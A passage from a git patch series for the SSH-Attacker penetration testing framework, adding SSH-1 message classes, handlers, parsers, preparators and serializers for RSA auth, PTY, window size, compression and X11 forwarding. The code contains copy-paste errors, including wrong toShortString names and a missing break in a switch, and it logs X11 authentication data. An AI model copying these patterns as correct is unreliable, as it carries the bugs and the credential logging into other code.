de.rub.nds.sshattacker.core.state.State; +import de.rub.nds.sshattacker.core.workflow.action.SshAction; import de.rub.nds.sshattacker.core.workflow.action.executor.WorkflowExecutorType; import de.rub.nds.tlsattacker.transport.TransportHandlerFactory; import java.io.IOException; @@ -113,11 +112,6 @@ public void initTransportHandler(Context context) { TransportHandlerFactory.createTransportHandler(context.getConnection())); context.getTransportHandler() .setResetClientSourcePort(config.isResetClientSourcePort()); - /* if (context.getTransportHandler() instanceof ClientTcpTransportHandler) { - ((ClientTcpTransportHandler) context.getTransportHandler()) - .setRetryFailedSocketInitialization( - config.isRetryFailedClientTcpSocketInitialization()); - }*/ } try { @@ -143,6 +137,29 @@ public void initTransportHandler(Context context) { } } + protected void executeAction(SshAction action, State state) throws SkipActionException { + try { + action.execute(state); + } catch (WorkflowExecutionException ex) { + LOGGER.error("Fatal error during action execution, stopping execution: ", ex); + state.setExecutionException(ex); + throw ex; + } catch (UnsupportedOperationException + | PreparationException + | ActionExecutionException ex) { + state.setExecutionException(ex); + LOGGER.warn("Not fatal error during action execution, skipping action: {}", action, ex); + throw new SkipActionException(ex); + } catch (Exception ex) { + LOGGER.error( + "Unexpected fatal error during action execution, stopping execution: ", ex); + state.setExecutionException(ex); + throw new WorkflowExecutionException(ex); + } finally { + state.setEndTimestamp(System.currentTimeMillis()); + } + } + public void closeConnection() { for (Context context : state.getAllContexts()) { try { From 6a4c8f39784d05832886af9bb8df36879eaf5d39 Mon Sep 17 00:00:00 2001 From: Steffen Brossler Date: Thu, 29 Feb 2024 23:46:30 +0100 Subject: [PATCH 155/176] Implementing more Messages --- .../core/layer/impl/SSH1Layer.java | 20 ++- .../AuthRhostsRsaMessageSSHV1Handler.java | 28 ++++ .../AuthRsaResponseMessageSSHV1Handler.java | 29 ++++ ...RequestCompressionMessageSSHV1Handler.java | 30 ++++ .../RequestPtyMessageSSHv1Handler.java | 28 ++++ .../WindowSizeMessageSSHv1Handler.java | 28 ++++ .../X11RequestForwardMessageSSHV1Handler.java | 33 +++++ .../message/AuthRhostsRsaMessageSSH1.java | 109 +++++++++++++++ .../message/AuthRsaResponseMessageSSH1.java | 64 +++++++++ .../RequestCompressionMessageSSH1.java | 65 +++++++++ .../ssh1/message/RequestPtyMessageSSH1.java | 132 ++++++++++++++++++ .../ssh1/message/WindowSizeMessageSSH1.java | 104 ++++++++++++++ .../message/X11RequestForwardMessageSSH1.java | 96 +++++++++++++ .../AuthRhostsRsaMessageSSHV1Parser.java | 50 +++++++ .../AuthRsaResponseMessageSSHV1Parser.java | 39 ++++++ .../RequestCompressionMessageSSHV1Parser.java | 39 ++++++ .../parser/RequestPtyMessageSSHv1Parser.java | 49 +++++++ .../parser/WindowSizeMessageSSHv1Parser.java | 42 ++++++ .../X11RequestForwardMessageSSHV1Parser.java | 46 ++++++ .../AuthRhostsRsaMessageSSHV1Preparator.java | 30 ++++ ...AuthRsaResponseMessageSSHV1Preparator.java | 31 ++++ ...uestCompressionMessageSSHV1Preparator.java | 35 +++++ .../RequestPtyMessageSSHv1Preparator.java | 29 ++++ .../WindowSizeMessageSSHv1Preparator.java | 29 ++++ ...1RequestForwardMessageSSHV1Preparator.java | 35 +++++ .../AuthRhostsRsaMessageSSHV1Serializier.java | 38 +++++ ...uthRsaResponseMessageSSHV1Serializier.java | 33 +++++ ...estCompressionMessageSSHV1Serializier.java | 34 +++++ .../RequestPtyMessageSSHv1Serializier.java | 40 ++++++ .../WindowSizeMessageSSHv1Serializier.java | 36 +++++ ...RequestForwardMessageSSHV1Serializier.java | 47 +++++++ 31 files changed, 1446 insertions(+), 2 deletions(-) create mode 100644 SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/handler/AuthRhostsRsaMessageSSHV1Handler.java create mode 100644 SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/handler/AuthRsaResponseMessageSSHV1Handler.java create mode 100644 SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/handler/RequestCompressionMessageSSHV1Handler.java create mode 100644 SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/handler/RequestPtyMessageSSHv1Handler.java create mode 100644 SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/handler/WindowSizeMessageSSHv1Handler.java create mode 100644 SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/handler/X11RequestForwardMessageSSHV1Handler.java create mode 100644 SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/message/AuthRhostsRsaMessageSSH1.java create mode 100644 SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/message/AuthRsaResponseMessageSSH1.java create mode 100644 SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/message/RequestCompressionMessageSSH1.java create mode 100644 SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/message/RequestPtyMessageSSH1.java create mode 100644 SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/message/WindowSizeMessageSSH1.java create mode 100644 SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/message/X11RequestForwardMessageSSH1.java create mode 100644 SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/parser/AuthRhostsRsaMessageSSHV1Parser.java create mode 100644 SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/parser/AuthRsaResponseMessageSSHV1Parser.java create mode 100644 SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/parser/RequestCompressionMessageSSHV1Parser.java create mode 100644 SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/parser/RequestPtyMessageSSHv1Parser.java create mode 100644 SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/parser/WindowSizeMessageSSHv1Parser.java create mode 100644 SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/parser/X11RequestForwardMessageSSHV1Parser.java create mode 100644 SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/preparator/AuthRhostsRsaMessageSSHV1Preparator.java create mode 100644 SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/preparator/AuthRsaResponseMessageSSHV1Preparator.java create mode 100644 SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/preparator/RequestCompressionMessageSSHV1Preparator.java create mode 100644 SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/preparator/RequestPtyMessageSSHv1Preparator.java create mode 100644 SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/preparator/WindowSizeMessageSSHv1Preparator.java create mode 100644 SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/preparator/X11RequestForwardMessageSSHV1Preparator.java create mode 100644 SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/serializer/AuthRhostsRsaMessageSSHV1Serializier.java create mode 100644 SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/serializer/AuthRsaResponseMessageSSHV1Serializier.java create mode 100644 SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/serializer/RequestCompressionMessageSSHV1Serializier.java create mode 100644 SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/serializer/RequestPtyMessageSSHv1Serializier.java create mode 100644 SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/serializer/WindowSizeMessageSSHv1Serializier.java create mode 100644 SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/serializer/X11RequestForwardMessageSSHV1Serializier.java diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/SSH1Layer.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/SSH1Layer.java index f88286b16..204cf29e3 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/SSH1Layer.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/SSH1Layer.java @@ -213,6 +213,7 @@ public void parseMessageFromID(AbstractPacket packet, SshContext context) { readDataFromStream(new StderrDataMessageSSH1(), (BinaryPacket) packet); break; case SSH_MSG_CHANNEL_OPEN_CONFIRMATION: + readDataFromStream(new ChannelOpenConfirmationMessageSSH1(), (BinaryPacket) packet); break; case SSH_SMSG_EXITSTATUS: readDataFromStream(new ExitStatusMessageSSH1(), (BinaryPacket) packet); @@ -254,14 +255,29 @@ public void parseMessageFromID(AbstractPacket packet, SshContext context) { case SSH_SMSG_X11_OPEN: readDataFromStream(new X11OpenMessageSSH1(), (BinaryPacket) packet); break; - case SSH_CMSG_AUTH_TIS: - break; case SSH_SMSG_SUCCESS: readDataFromStream(new SuccessMessageSSH1(), (BinaryPacket) packet); break; case SSH_SMSG_FAILURE: readDataFromStream(new FailureMessageSSH1(), (BinaryPacket) packet); break; + case SSH_CMSG_AUTH_RSA_RESPONSE: + readDataFromStream(new AuthRsaResponseMessageSSH1(), (BinaryPacket) packet); + break; + case SSH_CMSG_REQUEST_PTY: + readDataFromStream(new RequestPtyMessageSSH1(), (BinaryPacket) packet); + break; + case SSH_CMSG_WINDOW_SIZE: + readDataFromStream(new WindowSizeMessageSSH1(), (BinaryPacket) packet); + break; + case SSH_CMSG_AUTH_RHOSTS_RSA: + readDataFromStream(new AuthRhostsRsaMessageSSH1(), (BinaryPacket) packet); + break; + case SSH_CMSG_REQUEST_COMPRESSION: + readDataFromStream(new RequestCompressionMessageSSH1(), (BinaryPacket) packet); + break; + case SSH_CMSG_X11_REQUEST_FORWARDING: + readDataFromStream(new X11RequestForwardMessageSSH1(), (BinaryPacket) packet); default: LOGGER.debug( "[bro] cannot identifie {} as {} - returningn null", diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/handler/AuthRhostsRsaMessageSSHV1Handler.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/handler/AuthRhostsRsaMessageSSHV1Handler.java new file mode 100644 index 000000000..859fc4952 --- /dev/null +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/handler/AuthRhostsRsaMessageSSHV1Handler.java @@ -0,0 +1,28 @@ +/* + * SSH-Attacker - A Modular Penetration Testing Framework for SSH + * + * Copyright 2014-2022 Ruhr University Bochum, Paderborn University, and Hackmanit GmbH + * + * Licensed under Apache License 2.0 http://www.apache.org/licenses/LICENSE-2.0 + */ +package de.rub.nds.sshattacker.core.protocol.ssh1.handler; + +import de.rub.nds.sshattacker.core.layer.context.SshContext; +import de.rub.nds.sshattacker.core.protocol.common.SshMessageHandler; +import de.rub.nds.sshattacker.core.protocol.ssh1.message.AuthRhostsRsaMessageSSH1; +import org.apache.logging.log4j.LogManager; +import org.apache.logging.log4j.Logger; + +public class AuthRhostsRsaMessageSSHV1Handler extends SshMessageHandler { + + private static final Logger LOGGER = LogManager.getLogger(); + + public AuthRhostsRsaMessageSSHV1Handler(SshContext context) { + super(context); + } + + @Override + public void adjustContext(AuthRhostsRsaMessageSSH1 message) { + LOGGER.debug("Got Auth Rhosts RSA Message "); + } +} diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/handler/AuthRsaResponseMessageSSHV1Handler.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/handler/AuthRsaResponseMessageSSHV1Handler.java new file mode 100644 index 000000000..9c45dd1df --- /dev/null +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/handler/AuthRsaResponseMessageSSHV1Handler.java @@ -0,0 +1,29 @@ +/* + * SSH-Attacker - A Modular Penetration Testing Framework for SSH + * + * Copyright 2014-2022 Ruhr University Bochum, Paderborn University, and Hackmanit GmbH + * + * Licensed under Apache License 2.0 http://www.apache.org/licenses/LICENSE-2.0 + */ +package de.rub.nds.sshattacker.core.protocol.ssh1.handler; + +import de.rub.nds.sshattacker.core.layer.context.SshContext; +import de.rub.nds.sshattacker.core.protocol.common.SshMessageHandler; +import de.rub.nds.sshattacker.core.protocol.ssh1.message.AuthRsaResponseMessageSSH1; +import org.apache.logging.log4j.LogManager; +import org.apache.logging.log4j.Logger; + +public class AuthRsaResponseMessageSSHV1Handler + extends SshMessageHandler { + + private static final Logger LOGGER = LogManager.getLogger(); + + public AuthRsaResponseMessageSSHV1Handler(SshContext context) { + super(context); + } + + @Override + public void adjustContext(AuthRsaResponseMessageSSH1 message) { + LOGGER.warn("Auth RSA Response{}", message.getMd5Response().getValue()); + } +} diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/handler/RequestCompressionMessageSSHV1Handler.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/handler/RequestCompressionMessageSSHV1Handler.java new file mode 100644 index 000000000..d000bf74e --- /dev/null +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/handler/RequestCompressionMessageSSHV1Handler.java @@ -0,0 +1,30 @@ +/* + * SSH-Attacker - A Modular Penetration Testing Framework for SSH + * + * Copyright 2014-2022 Ruhr University Bochum, Paderborn University, and Hackmanit GmbH + * + * Licensed under Apache License 2.0 http://www.apache.org/licenses/LICENSE-2.0 + */ +package de.rub.nds.sshattacker.core.protocol.ssh1.handler; + +import de.rub.nds.sshattacker.core.layer.context.SshContext; +import de.rub.nds.sshattacker.core.protocol.common.SshMessageHandler; +import de.rub.nds.sshattacker.core.protocol.ssh1.message.RequestCompressionMessageSSH1; +import org.apache.logging.log4j.LogManager; +import org.apache.logging.log4j.Logger; + +public class RequestCompressionMessageSSHV1Handler + extends SshMessageHandler { + + private static final Logger LOGGER = LogManager.getLogger(); + + public RequestCompressionMessageSSHV1Handler(SshContext context) { + super(context); + } + + @Override + public void adjustContext(RequestCompressionMessageSSH1 message) { + LOGGER.warn( + "Recieved Request Compression Status {}", message.getCompressionState().getValue()); + } +} diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/handler/RequestPtyMessageSSHv1Handler.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/handler/RequestPtyMessageSSHv1Handler.java new file mode 100644 index 000000000..f77fa234a --- /dev/null +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/handler/RequestPtyMessageSSHv1Handler.java @@ -0,0 +1,28 @@ +/* + * SSH-Attacker - A Modular Penetration Testing Framework for SSH + * + * Copyright 2014-2022 Ruhr University Bochum, Paderborn University, and Hackmanit GmbH + * + * Licensed under Apache License 2.0 http://www.apache.org/licenses/LICENSE-2.0 + */ +package de.rub.nds.sshattacker.core.protocol.ssh1.handler; + +import de.rub.nds.sshattacker.core.layer.context.SshContext; +import de.rub.nds.sshattacker.core.protocol.common.SshMessageHandler; +import de.rub.nds.sshattacker.core.protocol.ssh1.message.RequestPtyMessageSSH1; +import org.apache.logging.log4j.LogManager; +import org.apache.logging.log4j.Logger; + +public class RequestPtyMessageSSHv1Handler extends SshMessageHandler { + + private static final Logger LOGGER = LogManager.getLogger(); + + public RequestPtyMessageSSHv1Handler(SshContext context) { + super(context); + } + + @Override + public void adjustContext(RequestPtyMessageSSH1 message) { + LOGGER.info("Recived a Request PTY Message"); + } +} diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/handler/WindowSizeMessageSSHv1Handler.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/handler/WindowSizeMessageSSHv1Handler.java new file mode 100644 index 000000000..fb44ebec1 --- /dev/null +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/handler/WindowSizeMessageSSHv1Handler.java @@ -0,0 +1,28 @@ +/* + * SSH-Attacker - A Modular Penetration Testing Framework for SSH + * + * Copyright 2014-2022 Ruhr University Bochum, Paderborn University, and Hackmanit GmbH + * + * Licensed under Apache License 2.0 http://www.apache.org/licenses/LICENSE-2.0 + */ +package de.rub.nds.sshattacker.core.protocol.ssh1.handler; + +import de.rub.nds.sshattacker.core.layer.context.SshContext; +import de.rub.nds.sshattacker.core.protocol.common.SshMessageHandler; +import de.rub.nds.sshattacker.core.protocol.ssh1.message.WindowSizeMessageSSH1; +import org.apache.logging.log4j.LogManager; +import org.apache.logging.log4j.Logger; + +public class WindowSizeMessageSSHv1Handler extends SshMessageHandler { + + private static final Logger LOGGER = LogManager.getLogger(); + + public WindowSizeMessageSSHv1Handler(SshContext context) { + super(context); + } + + @Override + public void adjustContext(WindowSizeMessageSSH1 message) { + LOGGER.info("Recived a Window Size Message"); + } +} diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/handler/X11RequestForwardMessageSSHV1Handler.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/handler/X11RequestForwardMessageSSHV1Handler.java new file mode 100644 index 000000000..ba1af04fa --- /dev/null +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/handler/X11RequestForwardMessageSSHV1Handler.java @@ -0,0 +1,33 @@ +/* + * SSH-Attacker - A Modular Penetration Testing Framework for SSH + * + * Copyright 2014-2022 Ruhr University Bochum, Paderborn University, and Hackmanit GmbH + * + * Licensed under Apache License 2.0 http://www.apache.org/licenses/LICENSE-2.0 + */ +package de.rub.nds.sshattacker.core.protocol.ssh1.handler; + +import de.rub.nds.sshattacker.core.layer.context.SshContext; +import de.rub.nds.sshattacker.core.protocol.common.SshMessageHandler; +import de.rub.nds.sshattacker.core.protocol.ssh1.message.X11RequestForwardMessageSSH1; +import org.apache.logging.log4j.LogManager; +import org.apache.logging.log4j.Logger; + +public class X11RequestForwardMessageSSHV1Handler + extends SshMessageHandler { + + private static final Logger LOGGER = LogManager.getLogger(); + + public X11RequestForwardMessageSSHV1Handler(SshContext context) { + super(context); + } + + @Override + public void adjustContext(X11RequestForwardMessageSSH1 message) { + LOGGER.warn( + "Forwarding X11 Request with Authentication Protocol {}, Authentication Data {} and screen Number {} ", + message.getX11AuthenticationProtocol().getValue(), + message.getX11AuthenticationData().getValue(), + message.getScreenNumber().getValue()); + } +} diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/message/AuthRhostsRsaMessageSSH1.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/message/AuthRhostsRsaMessageSSH1.java new file mode 100644 index 000000000..f00c7b7e2 --- /dev/null +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/message/AuthRhostsRsaMessageSSH1.java @@ -0,0 +1,109 @@ +/* + * SSH-Attacker - A Modular Penetration Testing Framework for SSH + * + * Copyright 2014-2022 Ruhr University Bochum, Paderborn University, and Hackmanit GmbH + * + * Licensed under Apache License 2.0 http://www.apache.org/licenses/LICENSE-2.0 + */ +package de.rub.nds.sshattacker.core.protocol.ssh1.message; + +import de.rub.nds.modifiablevariable.ModifiableVariableFactory; +import de.rub.nds.modifiablevariable.bytearray.ModifiableByteArray; +import de.rub.nds.modifiablevariable.integer.ModifiableInteger; +import de.rub.nds.modifiablevariable.string.ModifiableString; +import de.rub.nds.sshattacker.core.layer.context.SshContext; +import de.rub.nds.sshattacker.core.protocol.common.SshMessage; +import de.rub.nds.sshattacker.core.protocol.common.SshMessageParser; +import de.rub.nds.sshattacker.core.protocol.common.SshMessagePreparator; +import de.rub.nds.sshattacker.core.protocol.common.SshMessageSerializer; +import de.rub.nds.sshattacker.core.protocol.ssh1.handler.AuthRhostsRsaMessageSSHV1Handler; +import de.rub.nds.sshattacker.core.protocol.ssh1.parser.AuthRhostsRsaMessageSSHV1Parser; +import de.rub.nds.sshattacker.core.protocol.ssh1.preparator.AuthRhostsRsaMessageSSHV1Preparator; +import de.rub.nds.sshattacker.core.protocol.ssh1.serializer.AuthRhostsRsaMessageSSHV1Serializier; +import java.io.InputStream; + +public class AuthRhostsRsaMessageSSH1 extends SshMessage { + + private ModifiableInteger clientHostKeyBits; + private ModifiableString username; + private ModifiableByteArray hostPublicExponent; + private ModifiableByteArray hostPublicModulus; + + public ModifiableByteArray getHostPublicExponent() { + return hostPublicExponent; + } + + public void setHostPublicExponent(ModifiableByteArray hostPublicExponent) { + this.hostPublicExponent = hostPublicExponent; + } + + public void setHostPublicExponent(byte[] hostPublicExponent) { + this.hostPublicExponent = + ModifiableVariableFactory.safelySetValue( + this.hostPublicExponent, hostPublicExponent); + } + + public ModifiableByteArray getHostPublicModulus() { + return hostPublicModulus; + } + + public void setHostPublicModulus(ModifiableByteArray hostPublicModulus) { + this.hostPublicModulus = hostPublicModulus; + } + + public void setHostPublicModulus(byte[] publicModulus) { + this.hostPublicModulus = + ModifiableVariableFactory.safelySetValue(this.hostPublicModulus, publicModulus); + } + + public ModifiableString getUsername() { + return username; + } + + public void setUsername(ModifiableString username) { + this.username = username; + } + + public void setUsername(String username) { + this.username = ModifiableVariableFactory.safelySetValue(this.username, username); + } + + public ModifiableInteger getClientHostKeyBits() { + return clientHostKeyBits; + } + + public void setClientHostKeyBits(ModifiableInteger clientHostKeyBits) { + this.clientHostKeyBits = clientHostKeyBits; + } + + public void setClientHostKeyBits(int clientHostKeyBits) { + this.clientHostKeyBits = + ModifiableVariableFactory.safelySetValue(this.clientHostKeyBits, clientHostKeyBits); + } + + @Override + public AuthRhostsRsaMessageSSHV1Handler getHandler(SshContext context) { + return new AuthRhostsRsaMessageSSHV1Handler(context); + } + + @Override + public SshMessageParser getParser( + SshContext context, InputStream stream) { + return new AuthRhostsRsaMessageSSHV1Parser(context, stream); + } + + @Override + public SshMessagePreparator getPreparator(SshContext context) { + return new AuthRhostsRsaMessageSSHV1Preparator(context.getChooser(), this); + } + + @Override + public SshMessageSerializer getSerializer(SshContext context) { + return new AuthRhostsRsaMessageSSHV1Serializier(this); + } + + @Override + public String toShortString() { + return "SSH_MSG_CHANNEL_OPEN_FAILURE"; + } +} diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/message/AuthRsaResponseMessageSSH1.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/message/AuthRsaResponseMessageSSH1.java new file mode 100644 index 000000000..08723c95a --- /dev/null +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/message/AuthRsaResponseMessageSSH1.java @@ -0,0 +1,64 @@ +/* + * SSH-Attacker - A Modular Penetration Testing Framework for SSH + * + * Copyright 2014-2022 Ruhr University Bochum, Paderborn University, and Hackmanit GmbH + * + * Licensed under Apache License 2.0 http://www.apache.org/licenses/LICENSE-2.0 + */ +package de.rub.nds.sshattacker.core.protocol.ssh1.message; + +import de.rub.nds.modifiablevariable.ModifiableVariableFactory; +import de.rub.nds.modifiablevariable.integer.ModifiableInteger; +import de.rub.nds.sshattacker.core.layer.context.SshContext; +import de.rub.nds.sshattacker.core.protocol.common.SshMessage; +import de.rub.nds.sshattacker.core.protocol.common.SshMessageParser; +import de.rub.nds.sshattacker.core.protocol.common.SshMessagePreparator; +import de.rub.nds.sshattacker.core.protocol.common.SshMessageSerializer; +import de.rub.nds.sshattacker.core.protocol.ssh1.handler.AuthRsaResponseMessageSSHV1Handler; +import de.rub.nds.sshattacker.core.protocol.ssh1.parser.AuthRsaResponseMessageSSHV1Parser; +import de.rub.nds.sshattacker.core.protocol.ssh1.preparator.AuthRsaResponseMessageSSHV1Preparator; +import de.rub.nds.sshattacker.core.protocol.ssh1.serializer.AuthRsaResponseMessageSSHV1Serializier; +import java.io.InputStream; + +public class AuthRsaResponseMessageSSH1 extends SshMessage { + + private ModifiableInteger md5Response; + + public ModifiableInteger getMd5Response() { + return md5Response; + } + + public void setMd5Response(ModifiableInteger md5Response) { + this.md5Response = md5Response; + } + + public void setMd5Response(int md5Response) { + this.md5Response = ModifiableVariableFactory.safelySetValue(this.md5Response, md5Response); + } + + @Override + public AuthRsaResponseMessageSSHV1Handler getHandler(SshContext context) { + return new AuthRsaResponseMessageSSHV1Handler(context); + } + + @Override + public SshMessageParser getParser( + SshContext context, InputStream stream) { + return new AuthRsaResponseMessageSSHV1Parser(context, stream); + } + + @Override + public SshMessagePreparator getPreparator(SshContext context) { + return new AuthRsaResponseMessageSSHV1Preparator(context.getChooser(), this); + } + + @Override + public SshMessageSerializer getSerializer(SshContext context) { + return new AuthRsaResponseMessageSSHV1Serializier(this); + } + + @Override + public String toShortString() { + return "SSH_CMSG_EOF"; + } +} diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/message/RequestCompressionMessageSSH1.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/message/RequestCompressionMessageSSH1.java new file mode 100644 index 000000000..e25ddb27b --- /dev/null +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/message/RequestCompressionMessageSSH1.java @@ -0,0 +1,65 @@ +/* + * SSH-Attacker - A Modular Penetration Testing Framework for SSH + * + * Copyright 2014-2022 Ruhr University Bochum, Paderborn University, and Hackmanit GmbH + * + * Licensed under Apache License 2.0 http://www.apache.org/licenses/LICENSE-2.0 + */ +package de.rub.nds.sshattacker.core.protocol.ssh1.message; + +import de.rub.nds.modifiablevariable.ModifiableVariableFactory; +import de.rub.nds.modifiablevariable.integer.ModifiableInteger; +import de.rub.nds.sshattacker.core.layer.context.SshContext; +import de.rub.nds.sshattacker.core.protocol.common.SshMessage; +import de.rub.nds.sshattacker.core.protocol.common.SshMessageParser; +import de.rub.nds.sshattacker.core.protocol.common.SshMessagePreparator; +import de.rub.nds.sshattacker.core.protocol.common.SshMessageSerializer; +import de.rub.nds.sshattacker.core.protocol.ssh1.handler.RequestCompressionMessageSSHV1Handler; +import de.rub.nds.sshattacker.core.protocol.ssh1.parser.RequestCompressionMessageSSHV1Parser; +import de.rub.nds.sshattacker.core.protocol.ssh1.preparator.RequestCompressionMessageSSHV1Preparator; +import de.rub.nds.sshattacker.core.protocol.ssh1.serializer.RequestCompressionMessageSSHV1Serializier; +import java.io.InputStream; + +public class RequestCompressionMessageSSH1 extends SshMessage { + + private ModifiableInteger compressionState; + + public ModifiableInteger getCompressionState() { + return compressionState; + } + + public void setCompressionState(ModifiableInteger compressionState) { + this.compressionState = compressionState; + } + + public void setCompressionState(int compressionState) { + this.compressionState = + ModifiableVariableFactory.safelySetValue(this.compressionState, compressionState); + } + + @Override + public RequestCompressionMessageSSHV1Handler getHandler(SshContext context) { + return new RequestCompressionMessageSSHV1Handler(context); + } + + @Override + public SshMessageParser getParser( + SshContext context, InputStream stream) { + return new RequestCompressionMessageSSHV1Parser(context, stream); + } + + @Override + public SshMessagePreparator getPreparator(SshContext context) { + return new RequestCompressionMessageSSHV1Preparator(context.getChooser(), this); + } + + @Override + public SshMessageSerializer getSerializer(SshContext context) { + return new RequestCompressionMessageSSHV1Serializier(this); + } + + @Override + public String toShortString() { + return "SSH_CMSG_EOF"; + } +} diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/message/RequestPtyMessageSSH1.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/message/RequestPtyMessageSSH1.java new file mode 100644 index 000000000..3b5fe9329 --- /dev/null +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/message/RequestPtyMessageSSH1.java @@ -0,0 +1,132 @@ +/* + * SSH-Attacker - A Modular Penetration Testing Framework for SSH + * + * Copyright 2014-2022 Ruhr University Bochum, Paderborn University, and Hackmanit GmbH + * + * Licensed under Apache License 2.0 http://www.apache.org/licenses/LICENSE-2.0 + */ +package de.rub.nds.sshattacker.core.protocol.ssh1.message; + +import de.rub.nds.modifiablevariable.ModifiableVariableFactory; +import de.rub.nds.modifiablevariable.integer.ModifiableInteger; +import de.rub.nds.modifiablevariable.string.ModifiableString; +import de.rub.nds.sshattacker.core.layer.context.SshContext; +import de.rub.nds.sshattacker.core.protocol.common.SshMessage; +import de.rub.nds.sshattacker.core.protocol.common.SshMessageParser; +import de.rub.nds.sshattacker.core.protocol.common.SshMessagePreparator; +import de.rub.nds.sshattacker.core.protocol.common.SshMessageSerializer; +import de.rub.nds.sshattacker.core.protocol.ssh1.handler.RequestPtyMessageSSHv1Handler; +import de.rub.nds.sshattacker.core.protocol.ssh1.parser.RequestPtyMessageSSHv1Parser; +import de.rub.nds.sshattacker.core.protocol.ssh1.preparator.RequestPtyMessageSSHv1Preparator; +import de.rub.nds.sshattacker.core.protocol.ssh1.serializer.RequestPtyMessageSSHv1Serializier; +import java.io.InputStream; + +public class RequestPtyMessageSSH1 extends SshMessage { + + ModifiableString termEnvironment; + ModifiableInteger hightRows; + ModifiableInteger widthColumns; + ModifiableInteger widthPixel; + ModifiableInteger hightPixel; + ModifiableInteger ttyModes; + + public ModifiableString getTermEnvironment() { + return termEnvironment; + } + + public void setTermEnvironment(ModifiableString termEnvironment) { + this.termEnvironment = termEnvironment; + } + + public void setTermEnvironment(String termEnvironment) { + this.termEnvironment = + ModifiableVariableFactory.safelySetValue(this.termEnvironment, termEnvironment); + } + + public ModifiableInteger getHightRows() { + return hightRows; + } + + public void setHightRows(ModifiableInteger hightRows) { + this.hightRows = hightRows; + } + + public void setHightRows(int hightRows) { + this.hightRows = ModifiableVariableFactory.safelySetValue(this.hightRows, hightRows); + } + + public ModifiableInteger getWidthColumns() { + return widthColumns; + } + + public void setWidthColumns(ModifiableInteger widthColumns) { + this.widthColumns = widthColumns; + } + + public void setWidthColumns(int widthColumns) { + this.widthColumns = + 